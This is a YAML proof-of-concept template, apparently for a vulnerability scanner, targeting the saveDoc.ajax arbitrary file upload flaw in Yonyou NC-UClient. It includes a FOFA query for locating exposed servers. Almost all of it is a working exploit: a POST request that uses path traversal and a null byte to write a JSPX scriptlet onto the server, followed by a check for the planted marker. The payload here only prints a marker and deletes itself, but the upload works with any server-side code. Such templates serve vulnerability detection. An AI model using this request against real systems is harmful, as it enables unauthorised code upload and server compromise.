product: 用友NC-UClient
vName: 用友NC-UClient saveDoc.ajax任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友NClient saveDoc.ajax任意文件上传漏洞，攻击者可通过此漏洞上传恶意脚本文件，对服务器的正常运行造成安全威胁！
version: ''
note: ''
search:
  FOFA: app=“用友-UFIDA-NC” && title==“产品登录界面”
protocol: http
link: https://blog.csdn.net/qq_36618918/article/details/136510046
fix:
  - 请联系厂商进行修复或者升级到安全版本
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /uapws/saveDoc.ajax?ws=/../../52e039302a62d077.jspx%00
      dataJson:
        content: "<hi xmlns:hi=\"http://java.sun.com/JSP/Page\">\n      <hi:directive.page\
        \ import=\"java.util.*,java.io.*,java.net.*\"/>\n   <hi:scriptlet>\n     \
        \       out.println(\"95cc64dd2825f9df13ec4ad683ecf339\");new java.io.File(application.getRealPath(request.getServletPath())).delete();\
        \ \n   </hi:scriptlet>\n</hi>"
    verify:
      path: /uapws/52e039302a62d077.jspx
      logic: and
      check:
        - body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and